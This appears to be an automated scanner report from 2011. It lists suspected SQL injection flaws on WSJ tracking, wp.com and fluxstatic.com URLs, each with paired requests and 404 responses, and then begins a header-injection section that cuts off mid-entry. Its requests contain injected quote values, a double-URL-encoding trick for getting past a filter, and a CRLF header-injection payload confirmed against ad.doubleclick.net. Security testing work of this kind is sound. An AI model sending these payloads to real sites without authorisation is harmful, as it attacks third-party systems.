GET /b%2527/ss/djglobal,djwsj/1/H.20.3/s22808814137242?AQB=1&ndh=1&t=13/5/2011%2019%3A14%3A10%201%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Technology_SB10001424052702304665904576383880754844512&g=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&r=http%3A//online.wsj.com/public/page/news-tech-technology.html%3Frefresh%3Don&cc=USD&ch=Online%20Journal&server=online.wsj.com&v0=WSJ_Tech_LEADTop&events=event12%2Cevent18&c1=Article&c2=WSJ_Tech&c3=WSJ_Article_Technology&c4=WSJ_article_Technology_Banner%20Ads%20and%20Other%20%27Local%27%20Flops&v4=WSJ_Technology_SB10001424052702304665904576383880754844512&c5=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html&v5=WSJ_Tech_LEADTop&c6=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&c7=off&c8=WSJ%20Online%20Article&c9=preview&c10=WSJ_Tech_LEADTop&v11=Online%20Journal&c13=tech_main_story&c19=article_preview&c20=SB10001424052702304665904576383880754844512&c21=WSJ_Stu%20Woo%2C%20Geoffrey%20A.%20Fowler&c22=WSJ_Article_Tech&c24=Edition_North_America_USA&v25=WSJ_Tech&c26=WSJ_Tech&c27=WSJ_free&v29=WSJ_Tech&v31=Monday&v32=19%3A00&v37=WSJ_Article_Technology&c49=1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=WSJ_Tech_0_0_WP_2200&pidt=1&oid=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&ot=A&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:26:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 442
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/djglobal,djwsj/1/H.20.3/s22808814137242 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/djglobal,djwsj/1/H.20.3/s22808814137242?AQB=1&ndh=1&t=13/5/2011%2019%3A14%3A10%201%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Technology_SB10001424052702304665904576383880754844512&g=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&r=http%3A//online.wsj.com/public/page/news-tech-technology.html%3Frefresh%3Don&cc=USD&ch=Online%20Journal&server=online.wsj.com&v0=WSJ_Tech_LEADTop&events=event12%2Cevent18&c1=Article&c2=WSJ_Tech&c3=WSJ_Article_Technology&c4=WSJ_article_Technology_Banner%20Ads%20and%20Other%20%27Local%27%20Flops&v4=WSJ_Technology_SB10001424052702304665904576383880754844512&c5=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html&v5=WSJ_Tech_LEADTop&c6=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&c7=off&c8=WSJ%20Online%20Article&c9=preview&c10=WSJ_Tech_LEADTop&v11=Online%20Journal&c13=tech_main_story&c19=article_preview&c20=SB10001424052702304665904576383880754844512&c21=WSJ_Stu%20Woo%2C%20Geoffrey%20A.%20Fowler&c22=WSJ_Article_Tech&c24=Edition_North_America_USA&v25=WSJ_Tech&c26=WSJ_Tech&c27=WSJ_free&v29=WSJ_Tech&v31=Monday&v32=19%3A00&v37=WSJ_Article_Technology&c49=1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=WSJ_Tech_0_0_WP_2200&pidt=1&oid=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&ot=A&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:26:36 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.5. http://s0.wp.com/wp-content/themes/h4/i/ajax-loader.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/i/ajax-loader.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /wp-content/themes/h4/i'/ajax-loader.gif?m=1274328069g HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:17 GMT
Server: nginx
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-content/themes/h4/i''/ajax-loader.gif?m=1274328069g HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:18 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

1.6. http://s0.wp.com/wp-content/themes/h4/i/header-bg.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/i/header-bg.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /wp-content/themes'/h4/i/header-bg.png?2 HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:31:56 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-content/themes''/h4/i/header-bg.png?2 HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:31:57 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

1.7. http://s1.wp.com/wp-includes/js/swfobject.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s1.wp.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /wp-includes/js%2527/swfobject.js?m=1306159264g&ver=2.2 HTTP/1.1
Host: s1.wp.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:31 GMT
Server: nginx
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-includes/js%2527%2527/swfobject.js?m=1306159264g&ver=2.2 HTTP/1.1
Host: s1.wp.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:32 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

1.8. http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static0.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/ButtonControl.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-'/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-''/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599976
Date: Tue, 14 Jun 2011 00:28:15 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.9. http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static1.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/OverlayPanel.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients/Common/JS/Controls'/OverlayPanel.js?7636d0b0 HTTP/1.1
Host: static1.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common/JS/Controls''/OverlayPanel.js?7636d0b0 HTTP/1.1
Host: static1.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:07 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.10. http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static2.fluxstatic.com
Path:   /-/Clients/Common/JS/Common/AjaxBaseControl.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients'/Common/JS/Common/AjaxBaseControl.js?772b0733 HTTP/1.1
Host: static2.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599954
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients''/Common/JS/Common/AjaxBaseControl.js?772b0733 HTTP/1.1
Host: static2.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599997
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.11. http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Common/AjaxBasePage.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-'/Clients/Common/JS/Common/AjaxBasePage.js?772999d2 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599991
Date: Tue, 14 Jun 2011 00:28:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-''/Clients/Common/JS/Common/AjaxBasePage.js?772999d2 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599975
Date: Tue, 14 Jun 2011 00:28:27 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.12. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/PrefilledTextBox.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /-/Clients/Common%2527/JS/Controls/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599975
Date: Tue, 14 Jun 2011 00:28:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common%2527%2527/JS/Controls/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:24 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.13. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/PrefilledTextBox.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients/Common/JS/Controls'/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599971
Date: Tue, 14 Jun 2011 00:28:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common/JS/Controls''/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599970
Date: Tue, 14 Jun 2011 00:28:28 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

2. HTTP header injection
There are 15 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f1e1b%0d%0a757e311c10f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

